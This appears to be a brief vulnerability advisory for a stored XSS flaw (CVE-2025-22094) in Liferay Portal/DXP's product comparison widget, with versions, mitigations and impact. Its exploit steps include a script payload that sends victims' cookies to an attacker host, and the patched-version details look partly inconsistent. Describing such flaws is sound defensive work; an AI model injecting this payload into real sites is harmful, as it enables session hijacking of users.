Listen to this Post
The CVE-2025-22094 vulnerability is a stored Cross-Site Scripting (XSS) flaw within the Commerce Product Comparison Table widget of Liferay Portal and DXP. The vulnerability exists because the application fails to properly sanitize user-supplied input in the “Name” field of a Commerce Product. When a malicious actor with product creation privileges injects a crafted JavaScript payload into this field, the payload is stored in the database. The payload is then unsafely rendered in the HTML output of the Product Comparison Table widget whenever the manipulated product is viewed. This allows the attacker’s script to execute in the browser of any user viewing the comparison table, enabling session hijacking, defacement, or actions performed within the context of the victim’s authenticated session.
Platform: Liferay Portal/DXP
Version: 7.4.0-7.4.3.111
Vulnerability: Stored XSS
Severity: Moderate
date: 2025-10-08
Prediction: 2025-10-30
What Undercode Say:
`curl -s “https://api.github.com/advisories/GHSA-xxxx-xxxx-xxxx” | jq ‘.severity, .published_at’`
`docker run -p 8080:8080 liferay/portal:7.4.3.110`
``
How Exploit:
1. Attacker logs into Liferay.
2. Navigates to Commerce > Products.
3. Creates/edits a product name.
- Injects
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>.
5. Saves the product.
6. Victim views product comparison table.
7. Malicious script executes in victim’s browser.
Protection from this CVE
Update to Liferay Portal/DXP patched versions: 7.4.3.112 or 6.0.134. Implement strict output encoding for all user-controlled data rendered in the UI. Apply a Content Security Policy (CSP) to mitigate the impact of potential XSS flaws. Enforce input validation and sanitization on all product-related fields.
Impact:
Theft of user sessions. Unauthorized account actions. Website defacement. Escalation of privileges within the portal.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
